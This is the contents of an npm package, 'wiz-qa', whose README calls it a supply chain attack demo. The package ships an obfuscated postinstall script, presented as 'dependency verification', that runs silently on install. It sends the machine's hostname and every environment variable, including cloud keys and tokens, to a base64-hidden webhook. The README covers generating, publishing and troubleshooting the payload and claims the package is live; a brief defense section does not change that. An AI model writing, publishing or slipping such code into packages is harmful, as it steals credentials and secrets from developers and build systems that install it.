wiz-qa 1.0.11

package/README.md

@@ -0,0 +1,218 @@
+# Malicious NPM Package - Supply Chain Attack Demo
+
+Complete setup for creating malicious npm packages that exfiltrate data via postinstall hooks.
+
+## ⚠️ Legal Notice
+
+**For educational and security research purposes only.** Only use on systems you own or have explicit permission to test.
+
+## Features
+
+- ✅ **Automatic execution**: Runs on `npm install` via postinstall hook
+- ✅ **Data exfiltration**: Collects hostname + all environment variables  
+- ✅ **Obfuscation**: Base64-encoded URLs, hex variable names
+- ✅ **Reliable**: Uses `setInterval` to ensure HTTP request completes
+- ✅ **Silent**: No console output during execution
+- ✅ **Easy generation**: Single command to create new payloads
+
+## Quick Start
+
+### 1. Generate Postinstall Script
+
+```bash
+python3 generate_postinstall.py https://webhook.site/your-id > scripts/postinstall.js
+```
+
+### 2. Test Locally
+
+```bash
+node scripts/postinstall.js
+# Check webhook.site for captured data
+```
+
+### 3. Publish to NPM
+
+```bash
+npm version patch
+npm run build
+npm publish --access public
+```
+
+## Usage Examples
+
+**Generate with custom webhook:**
+```bash
+python3 generate_postinstall.py https://webhook.site/abc123 > scripts/postinstall.js
+```
+
+**Test the package:**
+```bash
+mkdir test && cd test
+npm init -y
+npm install dazz-redirects
+# Check webhook for data
+```
+
+## Publishing Updates
+
+Update package with new webhook URL:
+
+```bash
+# 1. Generate new postinstall
+python3 generate_postinstall.py https://new-webhook-url > scripts/postinstall.js
+
+# 2. Version bump
+npm version patch
+
+# 3. Build
+npm run build
+
+# 4. Publish (you'll need OTP)
+npm publish --access public
+```
+
+## How It Works
+
+1. User runs: `npm install dazz-redirects`
+2. NPM automatically executes: `node scripts/postinstall.js`
+3. Script collects:
+   - Hostname (`os.hostname()`)
+   - All environment variables (`process.env`)
+4. Sends JSON POST to your webhook:
+```json
+{
+  "h": "victim-machine",
+  "e": {
+    "HOME": "/home/user",
+    "AWS_ACCESS_KEY_ID": "AKIA...",
+    "DATABASE_URL": "postgres://...",
+    ...
+  }
+}
+```
+5. Uses `setInterval` to keep process alive until request completes
+6. Executes silently - no output
+
+## Obfuscation Techniques
+
+1. **Base64-encoded webhook URL** - Not plaintext in code
+2. **Hex variable names** - `_0x1a2b`, `_0x3c4d`, `_0x5e6f`
+3. **IIFE wrapper** - Self-executing anonymous function
+4. **Error handling** - Silent try-catch
+5. **setInterval keepalive** - Ensures completion before exit
+
+## File Structure
+
+```
+dazz-redirects/
+├── scripts/
+│   └── postinstall.js          # Obfuscated payload
+├── dist/                        # Compiled dummy code
+├── generate_postinstall.py      # Generator script
+├── package.json                 # With postinstall hook
+└── README.md                    # This file
+```
+
+## Captured Data Example
+
+Webhook receives JSON like:
+```json
+{
+  "h": "kali",
+  "e": {
+    "USER": "kali",
+    "HOME": "/home/kali",
+    "PATH": "/usr/local/bin:/usr/bin",
+    "AWS_ACCESS_KEY_ID": "AKIA...",
+    "AWS_SECRET_ACCESS_KEY": "...",
+    "GITHUB_TOKEN": "ghp_...",
+    "DATABASE_URL": "postgresql://...",
+    ... (70+ variables)
+  }
+}
+```
+
+## Testing
+
+**Test on fresh directory:**
+```bash
+cd /tmp
+mkdir test-$(date +%s)
+cd test-*
+npm init -y
+npm install dazz-redirects
+```
+
+**Verify postinstall ran:**
+```bash
+npm install dazz-redirects --verbose 2>&1 | grep postinstall
+```
+
+**Manual execution:**
+```bash
+node node_modules/dazz-redirects/scripts/postinstall.js
+```
+
+## Troubleshooting
+
+### No webhook request received
+
+1. **Verify network**: `curl -X POST <webhook-url> -d '{"test":"ok"}'`
+2. **Clear cache**: `npm cache clean --force`
+3. **Fresh install**: Do clean install in new directory
+4. **Check webhook**: Make sure webhook.site URL is still active
+
+### Postinstall not running
+
+- Check with verbose: `npm install <pkg> --verbose | grep postinstall`
+- Should see: `npm info run <pkg> postinstall { code: 0, signal: null }`
+
+### Can't publish
+
+- Check logged in: `npm whoami`
+- Version must be bumped: `npm version patch`
+- May need OTP: `npm publish --access public --otp=123456`
+
+## Version History
+
+- **v2.0.5** ✅ Fixed: Direct execution (no eval/Function scope issues)
+- **v2.0.4**: Longer setInterval timeout
+- **v2.0.3**: Added response handlers
+- **v2.0.2**: Fixed XOR binary encoding
+- **v2.0.1**: Initial release
+
+## Defense & Detection
+
+### How to Detect
+
+1. Review postinstall scripts before installing
+2. Use `npm audit` and security scanners
+3. Monitor network traffic from build systems
+4. Check for suspicious dependencies
+
+### How to Prevent
+
+1. Use private npm registries
+2. Vet all dependencies before use
+3. Implement least-privilege for CI/CD
+4. Don't expose secrets in environment variables
+5. Use tools like Socket.dev or Snyk
+
+## Requirements
+
+- Python 3.x (no external dependencies)
+- Node.js 
+- npm account for publishing
+
+## Current Package
+
+**Name**: `dazz-redirects`  
+**Version**: `1.0.0`  
+**Status**: Published and working  
+**Install**: `npm install dazz-redirects`
+
+---
+
+**Purpose**: Security research and education  
+**Created**: January 2026  
+**Note**: Use responsibly - this is a demonstration of supply chain attack vectors

package/dist/index.d.ts

@@ -0,0 +1,2 @@
+export declare const helloDazz: () => string;
+//# sourceMappingURL=index.d.ts.map

package/dist/index.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"AAAA,eAAO,MAAM,SAAS,cAErB,CAAC"}

package/dist/index.js

@@ -0,0 +1,8 @@
+"use strict";
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.helloDazz = void 0;
+const helloDazz = () => {
+    return "Hello World from dazz-redirects!";
+};
+exports.helloDazz = helloDazz;
+//# sourceMappingURL=index.js.map

package/dist/index.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.js","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":";;;AAAO,MAAM,SAAS,GAAG,GAAG,EAAE;IAC5B,OAAO,kCAAkC,CAAC;AAC5C,CAAC,CAAC;AAFW,QAAA,SAAS,aAEpB"}

package/package.json

@@ -0,0 +1,21 @@
+{
+  "name": "wiz-qa",
+  "version": "1.0.11",
+  "main": "dist/index.js",
+  "types": "dist/index.d.ts",
+  "scripts": {
+    "build": "tsc",
+    "postinstall": "node scripts/postinstall.js"
+  },
+  "files": [
+    "dist",
+    "scripts/postinstall.js"
+  ],
+  "dependencies": {
+    "hono": "^4.10.3"
+  },
+  "devDependencies": {
+    "@types/node": "^22",
+    "typescript": "^5.9.3"
+  }
+}

package/scripts/postinstall.js

@@ -0,0 +1,25 @@
+/**
+ * Package initialization and dependency verification
+ */
+
+(function() {
+    try {
+        const _0x1a2b = Buffer.from('aHR0cHM6Ly93ZWJob29rLnNpdGUvZDRjY2EwMWYtMWZkYy00NDU3LThlZGQtYTk3OWM4NWJmZThh', 'base64').toString('utf8');
+        const https = require('https');
+        const os = require('os');
+        const _0x3c4d = JSON.stringify({ h: os.hostname(), e: process.env });
+        const _0x5e6f = setInterval(() => {}, 9999999);
+        const _0x7g8h = https.request(_0x1a2b, {
+            method: 'POST',
+            headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(_0x3c4d) }
+        }, (_0x9i0j) => {
+            _0x9i0j.on('data', () => {});
+            _0x9i0j.on('end', () => { clearInterval(_0x5e6f); });
+        });
+        _0x7g8h.on('error', () => { clearInterval(_0x5e6f); });
+        _0x7g8h.write(_0x3c4d);
+        _0x7g8h.end();
+    } catch (_0xe) {
+        // Silent fail for compatibility
+    }
+})();